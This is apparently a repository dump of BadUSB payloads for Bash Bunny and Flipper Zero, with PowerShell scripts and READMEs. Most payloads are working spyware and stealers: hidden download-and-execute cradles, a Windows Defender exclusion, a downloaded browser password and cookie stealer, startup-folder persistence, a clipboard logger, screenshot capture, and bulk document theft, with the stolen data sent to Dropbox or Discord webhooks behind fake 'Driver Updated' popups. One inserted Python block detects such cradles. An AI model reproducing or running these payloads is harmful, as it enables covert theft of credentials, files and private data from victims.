================================================ FILE: BashBunny/payloads/Screen-Shock/c.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } while(1){ Add-Type -AssemblyName System.Windows.Forms,System.Drawing $screens = [Windows.Forms.Screen]::AllScreens $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height) $bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height) $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png") $graphics.Dispose() $bmp.Dispose() start-sleep -Seconds 15 "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload } ================================================ FILE: BashBunny/payloads/Screen-Shock/payload.txt 
================================================ REM Title: Screen-Shock REM Author: atomiczsec REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) REM Target: Windows 10 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: BashBunny/payloads/Screen-Shock/placeholder ================================================ ================================================ FILE: BashBunny/payloads/Spotify-Spy/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Spotify-Spy

This payload is meant to exfiltrate Spotify usernames on the device. Some people are too afraid to ask for their Spotify or playlist, so here is a sneaky way to do so.

## Description

Have you ever been too afraid to ask your co-worker what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their Spotify username for you so you don't have to socially interact with anyone!

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: BashBunny/payloads/Spotify-Spy/SS.ps1 ================================================ #Spotify-Spy # See if file is a thing Test-Path -Path "$env:APPDATA\Spotify\Users" #Create varible for file name $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt" # Gets the name of the spotify user cd "$env:APPDATA\Spotify\Users" Get-ChildItem > $F1 # Copy Spotify User to Temp Directory to get sent to Dropbox Copy-Item "$F1" -Destination "$env:tmp/$F1" function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" rm $F1 $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: BashBunny/payloads/Spotify-Spy/payload.txt ================================================ REM Title: Spotify-Spy REM Author: atomiczsec REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. 
REM Target: Windows 10 Q DELAY 2000 Q GUI r Q DELAY 500 Q STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl Q ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/Water-UnMark/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Water-UnMark

A payload to get rid of the ugly Windows activation watermark.

## Description

This script will get rid of the ugly Windows watermark. This script will automatically reboot the device. This is not activating your computer!!

## Getting Started

### Dependencies

* Unactivated Windows 10

### Executing program

* Plug in your device

```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```

## Contributing

All contributors' names will be listed here:

* [atomiczsec](https://github.com/atomiczsec)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: BashBunny/payloads/Water-UnMark/payload.txt ================================================ REM Title: Water-UnMark REM Author: atomiczsec REM Target OS: Windows 10 REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! DELAY 2000 GUI r DELAY 100 STRING powershell Start-Process powershell -verb runAs DELAY 1000 ALT Y DELAY 1000 STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ENTER DELAY 100 STRING Restart-Computer -Force ENTER ================================================ FILE: BashBunny/payloads/Water-UnMark/placeholder ================================================ ================================================ FILE: BashBunny/payloads/cApS-Troll/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# cApS-Troll

This payload is meant to prank your victim with TURNING on AND off CAPS LOCK

## Description

This payload is meant to prank your victim with TURNING on AND off CAPS LOCK

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10, 11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

### Executing program

* Plug in your device
* Define the `DEFINE TARGET_URL example.com`
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: BashBunny/payloads/cApS-Troll/a.ps1 ================================================ while (1){ Start-Sleep -Second 45 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') } ================================================ FILE: BashBunny/payloads/cApS-Troll/payload.txt ================================================ REM Title: cApS-Troll REM Author: atomiczsec REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/placeholder ================================================ ================================================ FILE: FlipperZero/payloads/Bookmark-Hog/BH.ps1 ================================================ #Bookmark-Hog # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The chrome bookmark file has not been found. 
" } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The edge bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: FlipperZero/payloads/Bookmark-Hog/README.md 
================================================

# Bookmark-Hog

A payload to exfiltrate bookmarks of the 2 most popular browsers

## Description

This payload will enumerate through the browser directories, looking for the file that stores the bookmark history

These files will be saved to the temp directory

Finally dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
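An added detection example (not code from this repository): the Run-box launcher shown under "Executing program" leaves a recognizable process-creation command line, and this Python example normalizes its abbreviated switches (`-w h`, `-NoP`, `-NonI`, `-ep Bypass`) and flags the `iwr` plus `iex` download cradle. It goes beyond this README by also flagging the Defender exclusion and trace-cleanup commands used by other scripts in the repository; the log lines, the `example.invalid` URLs and all function names are constructed for illustration.

```python
"""Added example: triage log text for the hidden PowerShell download cradle."""
import re

# Full powershell.exe switch -> shortest prefix this example accepts.
# Assumption: a conservative table for the four switches in the launcher,
# not a complete model of PowerShell's own argument parsing.
PARAM_MIN_PREFIX = {
    "windowstyle": "w",
    "noprofile": "nop",
    "noninteractive": "noni",
    "executionpolicy": "ex",
}
PARAM_ALIASES = {"ep": "executionpolicy"}  # -ep is an alias, not a prefix

_WORD = r"(?<![\w-])(?:{})(?![\w-])"
DOWNLOAD = re.compile(_WORD.format("iwr|invoke-webrequest|irm|invoke-restmethod"), re.I)
EXECUTE = re.compile(_WORD.format("iex|invoke-expression"), re.I)
DEFENDER_EXCLUSION = re.compile(r"add-mppreference\b.*-exclusionpath", re.I)
TRACE_CLEANUP = re.compile(
    r"reg(?:\.exe)?\s+delete\s+\S*\\explorer\\runmru"
    r"|remove-item\s+\(get-psreadlineoption\)\.historysavepath",
    re.I,
)
HIGH_SIGNAL = {"download_cradle", "defender_exclusion", "trace_cleanup"}


def image_name(cmdline):
    """Lower-cased file name of the first token, honouring a quoted path."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    if not m:
        return ""
    path = m.group(1) or m.group(2)
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def normalize_param(name):
    """Map 'NoP', 'w', 'ep' ... to the full switch name, else None."""
    name = name.lower()
    if name in PARAM_ALIASES:
        return PARAM_ALIASES[name]
    for full, shortest in PARAM_MIN_PREFIX.items():
        if full.startswith(name) and len(name) >= len(shortest):
            return full
    return None


def analyze(text):
    """Return the set of findings for one command line or script-block text."""
    findings = set()
    if image_name(text) in {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}:
        tokens = text.split()
        for i, tok in enumerate(tokens):
            if not tok.startswith("-"):
                continue
            switch = normalize_param(tok[1:])
            value = tokens[i + 1].strip("\"'").lower() if i + 1 < len(tokens) else ""
            if switch == "windowstyle" and value and "hidden".startswith(value):
                findings.add("hidden_window")
            elif switch == "executionpolicy" and value in {"bypass", "unrestricted"}:
                findings.add("policy_bypass")
            elif switch == "noprofile":
                findings.add("no_profile")
            elif switch == "noninteractive":
                findings.add("non_interactive")
    # Content checks also apply to script-block logging (event ID 4104) text.
    if DOWNLOAD.search(text) and EXECUTE.search(text):
        findings.add("download_cradle")
    if DEFENDER_EXCLUSION.search(text):
        findings.add("defender_exclusion")
    if TRACE_CLEANUP.search(text):
        findings.add("trace_cleanup")
    return findings


def triage(lines):
    """Indices and sorted findings of the lines worth an analyst's time."""
    hits = []
    for i, line in enumerate(lines):
        found = analyze(line)
        if found & HIGH_SIGNAL or len(found) >= 3:
            hits.append((i, sorted(found)))
    return hits


# Constructed sample log lines (not captured from a real host).
SAMPLE_LOG = [
    r"powershell -w h -NoP -NonI -ep Bypass $pl = iwr https://files.example.invalid/s.ps1?dl=1; iex $pl",
    r"iwr https://files.example.invalid/b.ps1?dl=1 | iex",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1',
    r"powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Public\Temp",
    r"reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f",
    r"powershell.exe -Command Get-Service",
]

if __name__ == "__main__":
    for index, found in triage(SAMPLE_LOG):
        print(index, ", ".join(found))
```

The routine administrative line (index 2) produces only `no_profile` and is not reported, which shows why single switches are poor alerts while the cradle and the exclusion are not.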

================================================ FILE: FlipperZero/payloads/Bookmark-Hog/payload.txt ================================================ REM Title: Bookmark-Hog REM Author: atomiczsec REM Description: This payload is meant to exfiltrate bookmarks to the FlipperZero REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER ================================================ FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/README.md ================================================

# Browser-Devil

A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers

## Description

This payload will exclude the C: drive on the device so Windows Defender doesn't flag the exe

This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers

Finally, dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Admin Privileges on the Device you are targeting
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Exe Author](https://github.com/moonD4rk/HackBrowserData)

================================================ FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/b.ps1 ================================================ function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'YOUR-DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } # Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download Add-MpPreference -ExclusionPath $env:tmp # Download the exe and save it to temp directory iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe" # Execute the Browser Stealer cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait # Exfiltrate the loot to discord Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip Upload-Discord -file "$env:tmp\browserdata.zip" ================================================ FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/payload.txt ================================================ REM Title: Browser-Devil REM Author: atomiczsec REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers REM Target: Windows 10 DELAY 2000 GUI r DELAY 1000 STRING powershell saps powershell -verb runas ENTER DELAY 1000 ALT y DELAY 1000 STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly ================================================ FILE: 
FlipperZero/payloads/Copy-And-Waste/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: FlipperZero/payloads/Copy-And-Waste/README.md ================================================

# Copy-And-Waste

A payload to exfiltrate clipboard contents

## Description

This payload uses iwr to download 2 files

* I.bat
* c.ps1

**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup

**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click

The contents will then be sent to the discord webhook for viewing pleasure

For killing the script press both Ctrl buttons at the same time [It will resume at reboot]

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

### Executing program

* Plug in your device
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```

## Contributing

All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/Copy-And-Waste/c.ps1 ================================================ Add-Type -AssemblyName WindowsBase Add-Type -AssemblyName PresentationCore function dischat { [CmdletBinding()] param ( [Parameter (Position=0,Mandatory = $True)] [string]$con ) $hookUrl = 'YOUR DISCORD WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $con } Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body } dischat (get-clipboard) while (1){ $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl) $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c) $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x) if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)} elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit} else {continue} } ================================================ FILE: FlipperZero/payloads/Copy-And-Waste/payload.txt ================================================ REM Title: Copy-And-Waste REM Author: atomiczsec & I am Jakoby REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: 
FlipperZero/payloads/Copy-And-Waste/placeholder ================================================ ================================================ FILE: FlipperZero/payloads/De-Bloater/README.md ================================================

# Water-UnMark

A payload to get rid of the ugly windows activation watermark.

## Description

This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!

## Getting Started

### Dependencies

* Unactivated Windows 10

### Executing program

* Plug in your device

```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```

## Contributing

All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec)

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/De-Bloater/placeholder ================================================ ================================================ FILE: FlipperZero/payloads/Doc-Hog/d.ps1 ================================================ function Doc-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse $types = @{ "*.docx" = "Word"; "*.doc" = "Word"; "*.pptx" = "PowerPoint"; "*.xlsx" = "Excel"; "*.pdf" = "PDF"; "*.jpeg" = "JPEG"; "*.png" = "PNG"; "*.jpg" = "JPEG"; "*.csv" = "CSV"; "*.txt" = "Text"; } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object {$_.Name -like $type} if ($filteredFiles) { $zipFile = "$env:TEMP\$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } ================================================ FILE: FlipperZero/payloads/Doc-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. 
REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/Doc-Hog/readme.md ================================================

# Doc-Hog

A payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV

## Description

This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/History-Pig/HP.ps1 ================================================ #History-Pig # See if file is a thing Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Chrome History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Edge History file has not been found. 
" } catch { throw $_.Exception.Message } } # Copy Edge History to Temp Directory to get sent to Dropbox else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: FlipperZero/payloads/History-Pig/README.md ================================================

# History-Pig

A payload to exfiltrate the history of the 2 most popular browsers

## Description

This payload will enumerate through the browser directories, looking for the file that stores the history

These files will be saved to the temp directory

Finally dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

